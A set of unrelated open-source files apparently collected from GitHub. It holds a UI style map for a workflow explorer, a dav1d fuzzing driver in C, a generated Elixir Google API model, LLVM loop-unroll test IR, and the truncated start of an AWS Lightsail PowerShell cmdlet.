"applicationFilterCategoryNode": {
"font-size": "12px",
"line-height": "28px",
"height": "28px",
"background-color": "#EEE",
"padding": "0px 5px",
"color": "#333",
"border-top": "0px solid #CCC",
"margin-bottom": "3px"
},
"applicationFilterItemAreaNode":{
"overflow": "hidden",
"margin-left": "10px",
"margin-bottom": "8px"
},
"applicationFilterItemNode": {
"padding": "3px",
"margin-top": "3px",
"margin-bottom": "2px",
"margin-left": "5px",
"float": "left",
"color": "#4a5bc4",
"background-color": "#FFF",
"cursor": "pointer",
"border": "1px solid #CCC"
},
"applicationFilterItemNode_over": {
"color": "#FFF",
"background-color": "#4c6b87",
"border": "1px solid #4c6b87"
},
"filterConditionNode": {
"height": "30px",
"margin-left": "10px",
"overflow": "hidden"
},
"filterListItemNode": {
"height": "24px",
"line-height": "24px",
"font-size": "12px",
"border": "1px solid #CCC",
"float": "left",
"margin-right": "10px",
"padding-left": "8px",
"margin-top": "4px",
"background-color": "#FFF",
"cursor": "default"
},
"filterListItemActionNode": {
"float": "right",
"height": "24px",
"width": "24px",
"cursor": "pointer",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/closeFilter.png) center center no-repeat"
},
"filterListItemTextNode": {
"height": "24px",
"cursor": "default",
"margin-right": "30px",
"color": "#666"
},
"filterListItemNode_over": {
"border": "1px solid #ff7010"
},
"filterListItemActionNode_over": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/closeFilterOver.png) center center no-repeat"
},
"filterListItemTextNode_over": {
"color": "#ff7010"
},
"workItemHeadNode": {
"margin-top": "5px",
"height": "40px",
"background-color": "#dddddd",
"color": "#666666",
"font-weight": "bold",
"line-height": "40px",
"font-family": "Microsoft YaHei",
"font-size": "14px"
},
"headArea1Node": {
"width": "38%",
"float": "left"
},
"headArea2Node": {
"width": "22%",
"float": "left"
},
"headArea3Node": {
"width": "40%",
"float": "left"
},
"checkAreaHeadNode": {
"width": "24px",
"float": "left",
"height": "40px"
},
"iconAreaHeadNode": {
"width": "24px",
"float": "left"
},
"titleAreaHeadNode": {
"margin-left": "48px",
"height": "40px"
},
"titleAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"statusAreaHeadNode": {
"width": "58px",
"float": "left",
"height": "40px"
},
"timeAreaHeadNode": {
"width": "90px",
"float": "left",
"height": "40px",
"line-height": "40px"
},
"activityAreaHeadNode": {
"margin-left": "58px",
"height": "40px"
},
"processAreaHeadNode": {
"margin-left": "90px",
"height": "40px"
},
"activityAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"processAreaTextNode": {
"padding": "10px 5px",
"height": "20px"
},
"personAreaHeadNode": {
"height": "40px",
"line-height": "40px",
"margin-right": "240px"
},
"actionAreaHeadNode": {
"width": "110px",
"float": "right",
"height": "40px"
},
"expireAreaHeadNode": {
"width": "130px",
"float": "right",
"height": "40px"
},
"workItemNode": {
"background-color": "#F6F6F6",
"border-top": "1px solid #FFF",
"border-bottom": "1px solid #CCC",
"overflow": "hidden"
},
"workItemNode_noread": {
"background-color": "#F6F6F6"
},
"workItemWorkNode_over": {
"background-color": "#f1f3fc"
},
"workItemWorkNode_remove": {
"background-color": "#ffcccc"
},
"workItemWorkNode_action": {
"background": "#cedaff"
},
"workItemWorkNode":{
"background-color": "#F6F6F6",
"min-height": "39px",
"overflow": "hidden",
"color": "#666666",
//"line-height": "39px",
"cursor": "pointer",
"font-family": "Microsoft YaHei",
"font-size": "12px"
},
"statusIconNode": {
"height": "39px",
"width": "16px",
"float": "left",
"background-repeat": "no-repeat",
"background-position": "center center"
},
"iconWorkNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/work.png) no-repeat center center",
},
"titleWorkNode": {
"font-weight": "bold"
},
"expireAreaNode": {
"padding": "10px 0px",
"height": "20px"
},
"actionStopWorkNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/stop.png) no-repeat center center",
},
"actionStopWorkActionNode": {
"height": "39px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/stop.png) no-repeat 5px center",
},
"actionOpenNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "22px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/open.png) no-repeat center center"
},
"actionOpenNode_over":{
"box-shadow": "1px 1x 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/open_over.png) no-repeat center center",
"background-color": "#666"
},
"actionOpenNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionProcessNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send.png) no-repeat center center"
},
"actionProcessNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send_over.png) no-repeat center center",
"background-color": "#666"
},
"actionProcessNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionRerouteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/route.png) no-repeat center center"
},
"actionRerouteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/route_over.png) no-repeat center center",
"background-color": "#666"
},
"actionRerouteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"actionDeleteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "10px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete.png) no-repeat center center"
},
"actionDeleteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete_over.png) no-repeat center center",
"background-color": "#666"
},
"actionDeleteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"workItemChildNode": {
"border-top": "1px solid #DDD",
"background-color": "#FFF",
"overflow": "hidden",
"padding-left": "50px"
},
"workItemTaskNode": {
"overflow": "hidden"
},
"workItemDonwNode": {
"overflow": "hidden"
},
"workItemReadNode": {
"overflow": "hidden"
},
"workItemReadedNode": {
"overflow": "hidden"
},
"workItemListTitleNode": {
"height": "30px",
"overflow": "hidden"
},
"workItemTaskTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/task.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemDoneTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/done.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemReadTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/read.png) no-repeat 4px center",
"padding-left": "24px"
},
"workItemReadedTitleNode": {
"height": "30px",
"line-height": "30px",
"font-weight": "bold",
"color": "#2fade7",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/readed.png) no-repeat 4px center",
"padding-left": "24px"
},
"taskAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"doneAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"readAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"readedAreaContentNode": {
"border-top": "1px solid #DDD",
"margin-bottom": "5px",
"overflow": "hidden"
},
"taskItemNode": {
"height": "30px",
"line-height": "30px",
"color": "#666",
"background": "transparent",
"border-bottom": "1px solid #EEE"
},
"taskItemNode_action": {
"background": "#cedaff"
},
"taskItemNode_remove": {
"background": "#ffeeee"
},
"taskArea1Node": {
"float": "left",
"width": "34%",
"overflow": "hidden",
"max-width": "300px"
},
"taskArea2Node": {
"float": "left",
"width": "16%",
"overflow": "hidden",
"max-width": "160px"
},
"taskArea3Node": {
"float": "left",
"width": "50%",
"overflow": "hidden"
},
"taskItemIconAreaNode": {
"margin-left": "30px",
"height": "30px",
"float": "left",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/list.png) no-repeat center center",
"width": "12px"
},
"taskItemPersonAreaNode": {
"margin-left": "42px",
"height": "30px",
"overflow": "hidden"
},
"taskItemTimeAreaNode": {
"height": "30px",
"max-width": "140px",
"overflow": "hidden"
},
"taskItemActivityNode":{
"height": "30px",
"overflow": "hidden",
"margin-right": "120px"
},
"taskItemActionNode": {
"height": "30px",
"float": "right",
"width": "120px"
},
"taskActionResetNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/reset.png) no-repeat center center"
},
"taskActionResetNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/reset_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionResetNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"taskActionFlowNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send.png) no-repeat center center"
},
"taskActionFlowNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/send_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionFlowNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"taskActionDeleteNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete.png) no-repeat center center"
},
"taskActionDeleteNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delete_over.png) no-repeat center center",
"background-color": "#666"
},
"taskActionDeleteNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"readActionFlagNode": {
"height": "20px",
"border-radius": "3px",
"border": "1px solid #666",
"width": "20px",
"line-height": "20px",
"margin-top": "5px",
"box-shadow": "1px 1px 2px #CCC",
"color": "#888",
"cursor": "pointer",
"float": "left",
"margin-right": "5px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/flag.png) no-repeat center center"
},
"readActionFlagNode_over":{
"box-shadow": "1px 1px 2px #999",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/flag_over.png) no-repeat center center",
"background-color": "#666"
},
"readActionFlagNode_down":{
"box-shadow": "-1px -1px 3px #999 inset"
},
"relativeTop": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupTop.png) no-repeat center bottom"
},
"relativeCenter": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupCenter.png) center top"
},
"relativeBottom": {
"min-height": "40px",
"height": "100%",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/groupBottom.png) center top"
},
"noListText": {
"color": "#999",
"height": "30px",
"line-height": "30px",
"margin-left": "60px",
"position": "relative",
"top": "-30px"
},
"filterViewNode": {
"height": "20px",
"line-height": "20px",
"padding": "3px 10px",
"float": "left",
"margin-right": "5px",
"margin-top": "7px",
"border": "1px solid #CCC",
"cursor": "pointer",
"background-color": "#FFF",
"border-radius": "5px",
"color": "#000"
},
"filterViewNode_current": {
"border": "1px solid #ff7010",
"color": "#ff7010",
"background-color": "#FFF",
"border-radius": "5px"
},
"viewTableNode": {
"margin": "10px 0px"
},
"viewHeadTh":{
"height": "30px",
"line-height": "30px",
"color": "#666666",
"background-color": "#DFDFDF",
"font-size": "14px",
"text-align": "left",
"padding-left": "16px"
},
"viewContentTrNode": {
},
"viewContentTdNode": {
"font-size": "14px",
"color": "#666666",
"height": "30px",
"padding": "3px 5px",
"border-bottom": "1px solid #CCC"
},
"viewContentGroupTdNode": {
"padding": "3px 5px",
"border-bottom": "1px solid #CCC",
"background-color": "#F9F9F9"
},
"viewContentTdGroupNode": {
"overflow": "hidden",
"cursor": "pointer"
},
"viewContentTdGroupIconNode": {
"float": "left",
"width": "20px",
"height": "20px",
"background": "url("+"../x_component_process_ViewDesigner/$View/default/icon/right.png) center center no-repeat",
},
"viewContentTdGroupTextNode": {
"height": "20px",
"font-weight": "bold",
"line-height": "20px",
"margin-left": "20px"
},
"statListNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "0px solid #999"
},
"statChartAreaNode": {
"height": "300px",
"overflow": "hidden",
"border": "1px solid #999"
},
"statTableAreaNode": {
"margin-top": "10px",
"max-height": "600px",
"overflow": "auto"
},
"statTableNode": {
"border-left": "1px solid #DFDFDF",
"border-top": "1px solid #DFDFDF",
"background-color": "#FFF",
"width": "100%"
},
"statHeadTh": {
"height": "30px",
"line-height": "30px",
"background-color": "#f0f8ff",
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF"
},
"statContentTdNode": {
"text-align": "center",
"padding": "3px",
"background-color": "#fff",
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF"
},
"statContentTdNode_selected": {
"background-color":"#faebd7"
},
"statChartFlagAreaNode": {
"width": "180px",
"height": "300px",
"float": "left",
"background-color": "#EEE",
"overflow": "auto",
"padding": " 10px 10px 15px 20px"
},
"statChartNode": {
//"margin-left": "180px",
"height": "300px",
"background-color": "#FFF",
"overflow": "hidden"
},
"noElementNode": {
"text-align": "center",
"padding": "20px",
"height": "60px",
"line-height": "60px",
"margin-top": "10px",
"margin-left": "0px",
"color": "#888",
"cursor": "pointer",
"font-size": "16px"
},
"statAllSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"width": "30px",
"overflow": "hidden",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAll.png) center center no-repeat",
"padding": "3px"
},
"statAllColSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAllCol.png) center center no-repeat",
"padding": "3px"
},
"statColSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat",
"cursor": "pointer",
"height": "20px",
"padding": "3px"
},
"statAllRowSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"height": "20px",
"cursor": "pointer",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checkAllRow.png) center center no-repeat",
"padding": "3px"
},
"statRowSelectTd": {
"border-right": "1px solid #DFDFDF",
"border-bottom": "1px solid #DFDFDF",
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat",
"cursor": "pointer",
"width": "30px",
"padding": "3px"
},
"statTableSelectedTd": {
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/checked.png) center center no-repeat"
},
"statTableSelectTd": {
"background": "url(../x_component_process_Application/$WorkExplorer/default/icon/check.png) center center no-repeat"
},
"ststChartFlagNode": {
"height": "30x",
"margin": "5px 5px 0px 0px",
"background-color": "#EEE",
"cursor": "default"
},
"ststChartFlagColorNode": {
"height": "24px",
"width": "24px",
"float": "left",
"box-shadow": "0px 0px 0px #FFF"
},
"ststChartFlagColorNode_over": {
"box-shadow": "2px 2px 5px #333"
},
"ststChartFlagNameNode": {
"height": "24px",
"line-height": "24px",
"font-size": "14px",
"margin-left": "34px",
"overflow": "hidden"
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright © 2018, VideoLAN and dav1d authors
* Copyright © 2018, Janne Grunau
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "config.h"
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include "dav1d_fuzzer.h"
// expects ivf input
int main(const int argc, char *const *const argv) {
int ret = -1;
FILE *f = NULL;
int64_t fsize;
const char *filename = NULL;
uint8_t *data = NULL;
size_t size = 0;
if (argc != 2) {
fprintf(stdout, "Usage:\n%s fuzzing_testcase.ivf\n", argv[0]);
return -1;
}
filename = argv[1];
if (!(f = fopen(filename, "rb"))) {
fprintf(stderr, "failed to open %s: %s\n", filename, strerror(errno));
goto error;
}
if (fseeko(f, 0, SEEK_END) == -1) {
fprintf(stderr, "fseek(%s, 0, SEEK_END) failed: %s\n", filename,
strerror(errno));
goto error;
}
if ((fsize = ftello(f)) == -1) {
fprintf(stderr, "ftell(%s) failed: %s\n", filename, strerror(errno));
goto error;
}
rewind(f);
if (fsize < 0 || fsize > INT_MAX) {
fprintf(stderr, "%s is too large: %"PRId64"\n", filename, fsize);
goto error;
}
size = (size_t)fsize;
if (!(data = malloc(size))) {
fprintf(stderr, "failed to allocate: %zu bytes\n", size);
goto error;
}
    if (fread(data, size, 1, f) != 1) {
fprintf(stderr, "failed to read %zu bytes from %s: %s\n", size,
filename, strerror(errno));
goto error;
}
ret = LLVMFuzzerTestOneInput(data, size);
error:
free(data);
if (f) fclose(f);
return ret;
}
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: This file is auto generated by the elixir code generator program.
# Do not edit this file manually.
defmodule GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
@moduledoc """
The `Status` type defines a logical error model that is suitable for different programming environments, including REST APIs and RPC APIs. It is used by [gRPC](https://github.com/grpc). Each `Status` message contains three pieces of data: error code, error message, and error details. You can find out more about this error model and how to work with it in the [API Design Guide](https://cloud.google.com/apis/design/errors).
## Attributes
* `code` (*type:* `integer()`, *default:* `nil`) - The status code, which should be an enum value of google.rpc.Code.
* `details` (*type:* `list(map())`, *default:* `nil`) - A list of messages that carry the error details. There is a common set of message types for APIs to use.
* `message` (*type:* `String.t`, *default:* `nil`) - A developer-facing error message, which should be in English. Any user-facing error message should be localized and sent in the google.rpc.Status.details field, or localized by the client.
"""
use GoogleApi.Gax.ModelBase
@type t :: %__MODULE__{
:code => integer(),
:details => list(map()),
:message => String.t()
}
field(:code)
field(:details, type: :list)
field(:message)
end
defimpl Poison.Decoder, for: GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
def decode(value, options) do
GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status.decode(value, options)
end
end
defimpl Poison.Encoder, for: GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status do
def encode(value, options) do
GoogleApi.Gax.ModelBase.encode(value, options)
end
end
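# Minimal decoding sketch (the JSON payload below is illustrative only):
#
#     json = ~s({"code": 5, "message": "Resource not found", "details": []})
#     {:ok, status} = Poison.decode(json, as: %GoogleApi.MachineLearning.V1.Model.GoogleRpc_Status{})
#     status.code    #=> 5
#     status.message #=> "Resource not found"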
| {
"pile_set_name": "Github"
} |
; Check that we don't crash on corner cases.
; RUN: opt < %s -S -loop-unroll -unroll-max-iteration-count-to-analyze=1000 -unroll-threshold=1 -unroll-max-percent-threshold-boost=200 -o /dev/null
; RUN: opt < %s -S -passes='require<opt-remark-emit>,loop(unroll-full)' -unroll-max-iteration-count-to-analyze=1000 -unroll-threshold=1 -unroll-max-percent-threshold-boost=200 -o /dev/null
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
@known_constant = internal unnamed_addr constant [10 x i32] [i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1, i32 1], align 16
define void @foo1() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%idx = zext i32 undef to i64
%add.ptr = getelementptr inbounds i64, i64* null, i64 %idx
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret void
}
define void @foo2() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%x = getelementptr i32, <4 x i32*> undef, <4 x i32> <i32 1, i32 1, i32 1, i32 1>
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret void
}
define void @cmp_undef() {
entry:
br label %for.body
for.body: ; preds = %for.inc, %entry
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.inc ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%x1 = load i32, i32* %arrayidx1, align 4
%cmp = icmp eq i32 %x1, undef
br i1 %cmp, label %if.then, label %for.inc
if.then: ; preds = %for.body
br label %for.inc
for.inc: ; preds = %for.body, %if.then
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.inc
ret void
}
define void @switch() {
entry:
br label %for.body
for.body:
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.inc ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%x1 = load i32, i32* %arrayidx1, align 4
switch i32 %x1, label %l1 [
]
l1:
%x2 = add i32 %x1, 2
br label %for.inc
for.inc:
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end:
ret void
}
define <4 x i32> @vec_load() {
entry:
br label %for.body
for.body:
%phi = phi i64 [ 0, %entry ], [ %inc, %for.body ]
%vec_phi = phi <4 x i32> [ <i32 0, i32 0, i32 0, i32 0>, %entry ], [ %r, %for.body ]
%arrayidx = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %phi
%bc = bitcast i32* %arrayidx to <4 x i32>*
%x = load <4 x i32>, < 4 x i32>* %bc, align 4
%r = add <4 x i32> %x, %vec_phi
%inc = add nuw nsw i64 %phi, 1
%cmp = icmp ult i64 %inc, 999
br i1 %cmp, label %for.body, label %for.exit
for.exit:
ret <4 x i32> %r
}
define void @ptrtoint_cast() optsize {
entry:
br label %for.body
for.body:
br i1 true, label %for.inc, label %if.then
if.then:
%arraydecay = getelementptr inbounds [1 x i32], [1 x i32]* null, i64 0, i64 0
%x = ptrtoint i32* %arraydecay to i64
br label %for.inc
for.inc:
br i1 false, label %for.body, label %for.cond.cleanup
for.cond.cleanup:
ret void
}
define void @ptrtoint_cast2() {
entry:
br i1 false, label %for.body.lr.ph, label %exit
for.body.lr.ph:
br label %for.body
for.body:
%iv = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.body ]
%offset = getelementptr inbounds float, float* null, i32 3
%bc = bitcast float* %offset to i64*
%inc = add nuw nsw i32 %iv, 1
br i1 false, label %for.body, label %exit
exit:
ret void
}
@i = external global i32, align 4
define void @folded_not_to_constantint() {
entry:
br label %for.body
for.body:
%iv = phi i32 [ 0, %entry ], [ %inc, %for.inc ]
%m = phi i32* [ @i, %entry ], [ %m, %for.inc ]
br i1 undef, label %if.else, label %if.then
if.then:
unreachable
if.else:
%cmp = icmp ult i32* %m, null
br i1 %cmp, label %cond.false, label %for.inc
cond.false:
unreachable
for.inc:
%inc = add nuw nsw i32 %iv, 1
%cmp2 = icmp ult i32 %inc, 10
br i1 %cmp2, label %for.body, label %for.end
for.end:
ret void
}
define void @index_too_large() {
entry:
br label %for.body
for.body:
%iv = phi i64 [ -73631599, %entry ], [ %iv.next, %for.inc ]
br i1 undef, label %for.body2, label %for.inc
for.body2:
%idx = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv
%x = load i32, i32* %idx, align 1
br label %for.inc
for.inc:
%iv.next = add nsw i64 %iv, -1
br i1 undef, label %for.body, label %for.end
for.end:
ret void
}
define void @cmp_type_mismatch() {
entry:
br label %for.header
for.header:
br label %for.body
for.body:
%d = phi i32* [ null, %for.header ]
%cmp = icmp eq i32* %d, null
br i1 undef, label %for.end, label %for.header
for.end:
ret void
}
define void @load_type_mismatch() {
entry:
br label %for.body
for.body:
%iv.0 = phi i64 [ 0, %entry ], [ %iv.1, %for.body ]
%arrayidx1 = getelementptr inbounds [10 x i32], [10 x i32]* @known_constant, i64 0, i64 %iv.0
%bc = bitcast i32* %arrayidx1 to i64*
%x1 = load i64, i64* %bc, align 4
%x2 = add i64 10, %x1
%iv.1 = add nuw nsw i64 %iv.0, 1
%exitcond = icmp eq i64 %iv.1, 10
br i1 %exitcond, label %for.end, label %for.body
for.end:
ret void
}
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright 2012-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use
* this file except in compliance with the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file.
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
* *****************************************************************************
*
* AWS Tools for Windows (TM) PowerShell (TM)
*
*/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Text;
using Amazon.PowerShell.Common;
using Amazon.Runtime;
using Amazon.Lightsail;
using Amazon.Lightsail.Model;
namespace Amazon.PowerShell.Cmdlets.LS
{
/// <summary>
/// Copies a manual snapshot of an instance or disk as another manual snapshot, or copies
/// an automatic snapshot of an instance or disk as a manual snapshot. This operation
/// can also be used to copy a manual or automatic snapshot of an instance or a disk from
/// one AWS Region to another in Amazon Lightsail.
///
///
/// <para>
/// When copying a <i>manual snapshot</i>, be sure to define the <code>source region</code>,
/// <code>source snapshot name</code>, and <code>target snapshot name</code> parameters.
/// </para><para>
/// When copying an <i>automatic snapshot</i>, be sure to define the <code>source region</code>,
/// <code>source resource name</code>, <code>target snapshot name</code>, and either the
/// <code>restore date</code> or the <code>use latest restorable auto snapshot</code>
/// parameters.
/// </para>
/// </summary>
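    /// <example>
    /// A minimal, hypothetical invocation (region and snapshot names are illustrative only):
    /// <code>Copy-LSSnapshot -SourceRegion us-east-1 -SourceSnapshotName "my-snapshot" -TargetSnapshotName "my-snapshot-copy"</code>
    /// </example>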
[Cmdlet("Copy", "LSSnapshot", SupportsShouldProcess = true, ConfirmImpact = ConfirmImpact.Medium)]
[OutputType("Amazon.Lightsail.Model.Operation")]
[AWSCmdlet("Calls the Amazon Lightsail CopySnapshot API operation.", Operation = new[] {"CopySnapshot"}, SelectReturnType = typeof(Amazon.Lightsail.Model.CopySnapshotResponse))]
[AWSCmdletOutput("Amazon.Lightsail.Model.Operation or Amazon.Lightsail.Model.CopySnapshotResponse",
